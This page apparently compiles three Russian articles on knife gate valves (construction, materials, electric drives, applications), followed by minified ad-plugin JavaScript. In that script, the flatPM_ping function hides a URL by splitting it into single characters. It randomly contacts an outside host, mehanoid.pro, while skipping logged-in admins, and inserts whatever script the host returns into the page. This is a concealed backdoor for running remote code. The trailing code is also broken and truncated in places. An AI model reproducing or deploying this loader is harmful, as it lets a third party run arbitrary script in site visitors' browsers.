Например, корпус может выполняться из чугуна, а внутренние элементы – из стали. Также применяется специальное покрытие для антикоррозионной защиты. Плотность арматуры в закрытом положении осуществляется за счет прижатия шибера к уплотнителю под давлением. Они выполняются с односторонней и двусторонней герметичностью.

Конструкция также вклоючает выдвижной или невыдвижной шток. При отсутствии большого пространства предпочтительнее применять невыдвижной шток, так как он потребует значительно меньше места. Задвижки имеют разнообразные способы управления: ручное или автоматическое.

Ручной привод используется при малом диаметре трубопроводов и небольшом потоке. В устройствах большого диаметра чаще применяется автоматический привод.

Установка

Шиберные задвижки устанавливают в водопроводные и канализационные системы. Они имеют несколько способов крепления к трубопроводу: фланцевый, межфланцевый и под приварку.

Для крепления задвижек применяют болты и шпильки.

Высокие технические характеристики и возможности шиберных задвижек, их большой диапазон применения и стойкость к различным агрессивным средам делают их универсальной и незаменимой запорной арматурой.

Источник: https://smtrading.ru/text/shibernye-zadvizhki-cmo-konstrukciya-i-osobennosti

Задвижка шиберная: особенности использования

Задвижка шиберная является устройством, которое предназначено для работы в качестве запорной арматуры в различных технологических линиях. Механизм применяют на магистральных трубопроводах для перекрытия движения грязных и шламовых вод, сыпучих материалов, бумажной и целлюлозной среды.

Приспособления используются в системах канализации, очистительных сооружениях, в энергетической, целлюлозно-бумажной, горнодобывающей, пищевой, химической и других сферах промышленности и коммунального хозяйства. Задвижка шиберная от других подобных устройств отличается конструкцией запорного элемента.

В данного типа приспособлениях используется металлическая пластина или клин, которые способны разрезать включения в протекающих внутри задвижки жидкостях. Запорная арматура применяется для полного перекрывания потока любой среды в трубопроводе.

Задвижки шиберные ножевая может устанавливаться с вертикально расположенным шпинделем, маховиком вверх только на горизонтальных трубопроводах. Каждый запорный вентиль может быть или полностью закрыт, или находиться в открытом состоянии.

Важно

Недопустимо использование запорных устройств для дросселирования (неполного закрытия или открытия).

Задвижка шиберная с электроприводом позволяет механизировать процесс работы устройства. Ее применяют для поддержания потоков с невысоким падением давления. Приспособления позволяют перекрыть доступ к оборудованию и имеют размеры от 10 мм до 2,7 метров. Большими габаритами обладают дроссельные устройства.

Запорная арматура состоит из штурвала и диска, который управляется винтообразным стержнем, двигающимся под прямым углом к потоку вверх или вниз. В закрытом положении диск для перекрытия потока упирается в две поверхности. Для удерживания жидкости в трубах и предотвращения утечек применяют сальник, идущий в комплекте с уплотнительными материалами.

Несмотря на широту применения, задвижка шиберная не всегда способна выполнять поставленную задачу. При низких давлениях для герметизации системы бывает недостаточно усилия устройства, в подобных случаях устанавливают краны со смазкой или клиновые задвижки.

Запорная арматура в зависимости от среды использования изготавливается из различных материалов. Задвижка шиберная, предназначенная для работы в катализатопроводах, производится из низколегированной или нержавеющей стали. С агрессивными условиями и значительными перепадами давления связаны использование виброуплотнительной футеровки и отказ от применения аустенитных сталей.

Во время промывки водой трубопроводов массные задвижки могут давать в прокладках небольшую течь. Однако их не следует подтягивать, поскольку устройства не предназначены для работы с водой, а проверить их герметичность можно только в условиях более плотных потоков.

Устройства с электрическим или гидравлическим приводом обычно применяют в работе технологических обвязок насосных станций, систем, предназначенных для приема и запуска разделителей.

Источник: https://incomewm.ru/zadvizhka-shibernaya-osobennosti-ispolzovaniya.html

Как устроена шиберная задвижка с электроприводом, где используется

Задвижки являются неотъемлемой частью практически всех систем трубопроводов. Довольно большое распространение получили задвижки шиберного типа с электрическим приводом. Подобный вариант исполнения характеризуется довольно большим количеством особенностей, которые должны учитываться. Рассмотрим особенности подобной конструкции подробнее.

Что такое шиберная задвижка?

Все задвижки предназначены для перекрытия хода тока в системе. Шиберная характеризуется следующими особенностями:

  1. Конструктивные особенности механизма определяют то, что он способен полностью перекрыть поперечное сечение трубопровода.
  2. Структура материала не играет практически никакой роли.
  3. В качестве запорного механизма может использоваться плоский или клиновидный нож. Подобный элемент может перемещаться в вертикальном направлении и полностью перекрывать сечение.

В целом можно сказать, что конструкция подобного механизма довольно проста, за счет чего обеспечивается длительный эксплуатационный срок. Вариант с электрическим приводом характеризуется тем, что рассчитан на передачу большого усилия, работа может быть частично или полностью автоматизирована.

Устройство задвижки клинового типа

Клиновидный вариант исполнения подходит в случае, когда нужно обеспечить высокую степень герметизации потока. Среди особенностей этого варианта исполнения задвижки можно отметить следующие моменты:

  1. Конструкция способна работать при высоком давлении.
  2. Запорный элемент выполнен в виде клина, за счет чего обеспечивается плотное прилегание к седлу.
  3. Для повышения степени герметизации при изготовлении седла применяются мягкие материалы, изготавливаемые на основе каучука.
  4. Основная сфера применения устройства с клиновидным запорных механизмом – канализация.

Принцип действия механизма довольно прост, что и определяет его довольно широкое распространение. Работает он по следующему принципу:

  1. Усилие создается при помощи электрического привода. Подобный элемент способен автоматизировать работу устройства. Стоит учитывать, что для перекрытия потока часто требуется довольно высокое давление. Именно поэтому при установке механизма на трубопровод с большим поперечным сечением часто используется именно электрический привод и редуктор для повышения передаваемого усилия.
  2. Передвижение клина происходит в направлении, перпендикулярно потоку.
  3. На момент полного закрытия транспортируемая среда оказывает сильное давление на клин, за счет чего он деформируется и оказывает давление на седло. Под действием прижимной силы уплотнительный материал деформируется и обеспечивается высокая степень герметичности.

Рассматривая подобный вариант исполнения задвижки следует учитывать тот момент, что при активной эксплуатации часто изнашиваются уплотнения.

К основным требованиям, которые предъявляются к шиберным задвижкам, можно отнести следующее:

  1. Поверхность седла и клина должны быть идеально подогнаны друг к другу.
  2. Для получения точного изделия проводится притирка, которая считается трудоемким процессом.
  3. При повреждении запорного элемента не только снижается степень герметизации, но есть и вероятность заклинивания устройства при работе.
  4. Если механизм устанавливается для эксплуатации в системе, которая предназначена для транспортировки среды с высокой температурой, то есть вероятность расширения используемого материала. Подобная ситуация становится причиной возникновения аварийной ситуации.

Многие недостатки механизма, которые могут привести к аварийной ситуации, определили распространение шиберной задвижки ножевого типа. Она более надежная и рассчитана на неблагоприятные условия эксплуатации.

Ножевая шиберная задвижка – область применения

Конструктивной особенностью подобного варианта исполнения можно назвать использование задвижки, которая напоминает нож. Она имеет небольшую толщину и действует как обыкновенный нож. Сфера применения подобного устройства достаточно обширна:

  1. Горная промышленность.
  2. Нефтеперерабатывающая.
  3. Целлюлозно-бумажные комбинаты.
  4. Канализация и вентиляция.

Стоит учитывать, что некоторые варианты исполнения подобных механизмов способны работать и с разряженной средой, то есть при условии вакуума. Именно поэтому они получили весьма широкое распространение в самых различных отраслях промышленности.

Применяемые материалы при изготовлении

При изготовлении задвижек могут использоваться самые различные материалы. Чаще всего корпус представлен литой конструкцией из нержавеющей стали или чугуна. К особенностям выбора устройства по типу применяемого материала при ее изготовлении можно отнести следующие моменты:

  1. Чугун более восприимчив к воздействию окружающей среды. Именно поэтому выбирать подобную модификацию следует с учетом условий эксплуатации.
  2. Если механизм будет эксплуатироваться при низкой температуре, то рекомендуется уделить внимание вариантам исполнения из различных сталей. Подобный материал более устойчив к воздействию окружающей среды и перепадам температуры. На сегодняшний день могут использовать и нержавеющие стали, которые характеризуются большей устойчивостью к влаге и химическим веществам.

Не стоит также забывать о том, что чугун крайне плохо переносит удары и другую переменную нагрузку. Именно поэтому следует уделять внимание защите конструкции от механического воздействия со стороны окружающей или транспортируемой среды. Что касается уплотнительных элементов, они могут изготавливаться из самых различных материалов, в большинстве случаев из каучука.

Устанавливаемый привод

Как ранее было отмечено, большое значение имеет тип установленного привода. Электрический на сегодняшний день получил весьма широкое распространение, что связано с его основными качествами. Примером можно назвать:

  1. Есть возможность автоматизировать работу конструкции. В некоторых системах устанавливается пульт удаленного доступа или механизм работает от установленных датчиков и блока управления.
  2. На перекрытие потока уходит намного меньше времени. Это связано с высокой эффективностью электрического привода.
  3. Есть возможность провести установку задвижки в качестве запорного элемента для трубопроводов большого поперечного сечения. Для того чтобы повысить усилие в качестве промежуточного элемента применяется редуктор.

Однако, у подобного привода есть и несколько существенных недостатков. Первый связан с тем, что нужно обеспечивать постоянную подачу электроэнергии. При ее отсутствии придется проводить ручное перекрытие, если в конструкции предусмотрено подобное устройство.

Вторым недостатком можно назвать довольно большие габариты электрического привода. Еще не стоит забывать о том, что нужно обеспечивать высокую степень герметичности привода, так как попадание влаги может привести к короткому замыканию и некоторым другим проблемам.

В заключение отметим, что выделяют несколько разновидностей подобного механизма, каждая имеет свои определенные достоинства и недостатки, которые должны учитываться.

Источник: http://www.admiral-omsk.ru/shibernaia-zadvizhka-s-elektroprivodom

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};